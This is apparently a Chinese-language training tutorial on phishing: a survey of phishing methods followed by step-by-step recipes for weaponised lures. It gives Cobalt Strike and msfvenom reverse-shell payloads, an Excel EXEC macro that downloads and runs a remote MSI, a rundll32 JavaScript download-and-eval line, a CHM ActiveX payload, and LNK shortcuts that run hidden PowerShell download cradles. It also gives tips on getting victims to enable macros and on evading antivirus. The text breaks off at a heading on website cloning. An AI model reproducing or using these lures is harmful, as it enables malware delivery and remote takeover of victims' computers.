day7-社工钓鱼技术(上午:钓鱼技巧与制作)

day7-社工钓鱼技术(上午:钓鱼技巧与制作)

前言:

网络钓鱼是最常见的社会工程学攻击方式之一。所谓社会工程学,是一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段。在生活工作中,最常使用的邮件、各种文档也成为黑客常用的攻击载体。近些年来,网络钓鱼攻击趋势也一直呈增长趋势,特别是在APT攻击、勒索软件攻击等事件中,扮演了重要的角色。

钓鱼常用技巧

邮件钓鱼

钓鱼邮件指利用伪装的电邮,欺骗收件人将账号、口令等信息回复给指定的接收者;或引导收件人连接到特制的网页,这些网页通常会伪装成和真实网站一样,如银行或理财的网页,令登录者信以为真,输入信用卡或银行卡号码、账户名称及密码等而被盗取。

钓鱼WIFI

仿造一个假的wifi,欺骗用户登陆,之后窃取用户信息。

伪基站

又称假基站、假基地台,是一种利用GSM单向认证缺陷的非法无线电通信设备,主要由主机和笔记本电脑组成,能够搜取以其为中心、一定半径范围内的GSM移动电话信息,并任意冒用他人手机号码强行向用户手机发送诈骗、推销等垃圾短信,通常安放在汽车或者一个比较隐蔽的地方发送。

标签钓鱼

标签钓鱼(tabnabbing)是一种新的网络钓鱼攻击手法,该攻击手法是由Mozilla Firefox浏览器的界面及创意负责人Aza Raskin发现和命名的,tabnabbing可改变用户浏览网页的标签及接口,以诱导用户输入网络服务的账号与密码。 

鱼叉式网络钓鱼

这是指一种源自于亚洲与东欧,只针对“特定的目标”进行的网络钓鱼攻击!简而言之就是组织一次有目性的,对特定的单位进行钓鱼攻击。

水坑攻击

”水坑攻击”,黑客攻击方式之一,顾名思义,是在受害者必经之路设置了一个“水坑(陷阱)”。最常见的做法是,黑客分析攻击目标的上网活动规律,寻找攻击目标经常访问的网站的弱点,先将此网站“攻破”并植入攻击代码,一旦攻击目标访问该网站就会“中招”。

U盘钓鱼

简单来说,就是在U盘里面植入木马或者病毒,进行钓鱼上线。常见的攻击手法就是把U盘扔在目标单位门口,或者你可以社工员工地址信息并邮寄给他。亦或者,可以像某黑客电影或者黑客游戏一样,想办法进入对方大厦到工位电脑上插U盘上马。

钓鱼附件制作

Office宏

宏是Office自带的一种高级脚本特性,通过VBA代码,可以在Office中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。由于早些年宏病毒泛滥,现在Office的宏功能已经默认是禁用,但依然无法阻挡攻击者使用宏。那么如何引诱受害者开启宏功能就是关键了,常用的套路:

  • 文档是被保护状态,需要启用宏才能查看;
  • 添加一张模糊的图片,提示需要启用宏才能查看高清图片;
  • 提示要查看文档,按给出的一系列步骤操作;
  • 贴一张某杀毒软件的Logo图片,暗示文档被安全软件保护。

cobalt strike 生成宏

image

选择好设置的监听器后 复制宏代码

image

创建 docx 文件 选择自定义功能

image

image

勾选上 开发工具

image

image

创建宏 填写名字 宏的位置在当前文件名。

image

image

将生成好的宏代码复制到文件里 选择 auto_open 自动打开

存为 dotm 文件

测试宏

将文件发送给受害者,如果受害者打开。

image

提示宏被禁用 如果用户点击启动内容。Cobal tstrike 就会获得受害人的 beacon

image

可以看到受害者已经中了后门,可以对用户进行其他方面的操作。

利用DOCX文档远程模板注入执行宏

与传统的宏启用文档相比,这种攻击的好处是多方面的。在对目标执行网络钓鱼攻击时,您可以将.docx的文档直接附加到电子邮件中,并且您不太可能根据文件的拓展名去阻止它。许多组织机构阻止以.doc或.docm为拓展名的文档却允许.docx文档,是因为它们不会包含宏。这种攻击更常见另一个原因可能是因为附件本身不包含恶意代码,任何静态电子邮件扫描程序都不会看到宏本身,因此不太可能被阻止。从而能过很多静态的检测。

方法:

想要开始此攻击,我们需要创建两个不同的文件。第一个是启用宏的模板,或是.dotm文件,它将包含恶意VBA宏。第二个是看似没有危害的.docx文件,它本身不包含恶意代码,只有指向恶意模板文件的目标链接。

 1.创建 dotm 文件

新建文件 docx 文件 选择 VIsual Basi

image

2.双击ThisDocument,把CS的代码粘贴到里面,另存为dotm文件

image

image

image

3.将文件上传到攻击者服务器,使用python启动web服务

python3 -m http.server 8877

image

4.创建一个正常的word文件,在开始处,选择一个模板

image

5.将其后缀改成zip,然后解压,修改 word\_rels\settings.xml.rels 里的 Target 改成 dotm 文件的访问网址

image

6.再次压缩之后,将其改为正常的docx文档,必需要在此目录全选之后压缩

image

7.执行测试

将文档发送给受害者之后,docx 文件是会从远程加载的宏文件,这时候需要点击是

image

8.启用文件后 就会获得受害者的用户权限。这种方法 docx 避免杀毒软件查杀,而 且隐蔽

image

Excel的展示

Excel跟 word文档 一样都是支持宏,所以一样存在宏病毒。当我们把恶意的宏代码嵌入 Excel 中,用户打开 Excel 文件里的宏就会被触发。

metasplosit 生成 msi 文件

1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.133 lport=3223 -f msi -o hack.msi

开启监听器

1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.88.133
set lport 3223
exploit -j

打开 excel 底部右键插入宏表

image

简单演示打开以下计算器

=EXEC(“calc.exe”)

image

1
2
=EXEC("msiexec /q /i http://192.168.88.133:8877/hack.msi") 
=HALT()

更改单元格名为 Auto_Open

image

隐藏起来

image

保存为22.xlsm

image

双击打开后,宏会恶意请求远程服务器 msi 文件自动下载运行。

image

成功上线

image

CHM文档

CHM介绍

CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代 的帮助文件格式,利用 HTML 作源文,把帮助内容以类似数据库的形式编译储 存。CHM 支持 Javascript、VBscript、ActiveX、Java Applet、Flash、常见图形文 件(GIF、JPEG、PNG)、音频视频文件(MID、WAV、AVI)等等,并可以通过 URL 与 Internet 联系在一起。因为使用方便,形式多样也被采用作为电子书的格式。 Chm 文件因何变得危险,此文件可以被植入可执行代码。成功的利用需要欺骗用户打开恶意的CHM文件,该文件可用于执行恶意代码。其缺点就是打开时会出现弹黑框、卡顿,容易被察觉。

在正式打造我们的电子书木马前,我们先分析一下它的“优点”吧!

一:因为电子书一般是在本地电脑域打开的,因此它所获得的权限也是本地 电脑域的权限,所以比起网页木马的 Internet 域来,让木马获得执行的机会要简 单的多,“不必使用漏洞”就可以执行,从而也就不会被杀毒软件查杀,如果你 的木马程序够好的话。也不必担心别人打了补丁。

二:现在的网页木马由于影响力太大,一般的人上网都会小心三分提防的, 且它依赖于漏洞,所以生存的空间正在逐渐缩小,与此相反的是电子书的火爆下 载,使得电子书木马的传播能力以及范围大大加强。

 三:由于木马程序嵌入电子书里,一般的杀毒软件无法对其中存在的木马病 毒等破坏性程序进行检查和清除,至少我还没发现有哪个软件可以做到这点,而且如果对这类电子书进行检查,杀毒所需时间也会过长。

四:还有最后一点就是,网页木马一般都要自己辛辛苦苦的去传播,并且站点随时可能被关闭,而电子书却可以让许多大的下载站点做贡献。获得长久时间 的传播,当然前提是这本电子书够精彩。

制作 chm 钓鱼文件

项目地址 https://github.com/Ridter/MyJSRat

这个工具是用 python2 编写,脚本修改分为两个模式,交互模式以及执行命令模 式。大多数情况使用交互模式。

本地监听

1
python MyJSRat.py -i 192.168.88.133 -p 8085

访问:http://192.168.88.133:8085/wtf ,访问 wft 这就是恶意代码可以嵌入 chm 电子书里,注意:需要在rundll32.exe后添加一个逗号

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.88.133:8084/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

制作 chm 电子书

Easy CHM 是一款 CHM 电子书或 CHM 帮助文件的制作工具,只需三步即可完 成 CHM 的制作,用户只需指定相应目录,该软件将会导入该文件夹内所有文件, 然后用户就可以设置 CHM 编译选项、开始制作。EasyCHM 可用于个人或者单 位制作高压缩比的带有全文检索及高亮显示搜索结果的网页集锦、CHM 帮助文 件、专业的产品说明、公司介绍、CHM 电子书等等

钓鱼 payloay

将下面的payload保存为html文件放到一个文件夹中

1
2
3
4
5
6
7
8
9
10
11
12
<!DOCTYPE html><html><head><title>diaoyuceshi</title><head></head><body>
shuoming
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

打开 Easy CHM 新建->浏览->选择目录

编译根据需求设置好选项后,生成chm 即可。

image

image

当受害人打开制作有后门的 chm 电子书,即可获取受害者的权限

image

结果

image

LNK文件

LNK(快捷方式或符号链接)是引用其他文件或程序的方法,最著名的就是震网病毒(Stuxnet)中的利用,在最新的利用样本也有很多。

钓鱼制作

1.生成powershell上线的payload

image

选择监听器

image

1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.88.133:80/a'))"

在桌面创建快捷方式 右键 目标填写 payload

image

1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.88.133:80/b'))"

image

image

更改图标

为了让快捷方式伪装的像诱导文件,可以选择更改图标

image

1
%SystemRoot%\System32\SHELL32.dll

当受害者双击打开 就是执行恶意的 powershell

image

image

克隆网站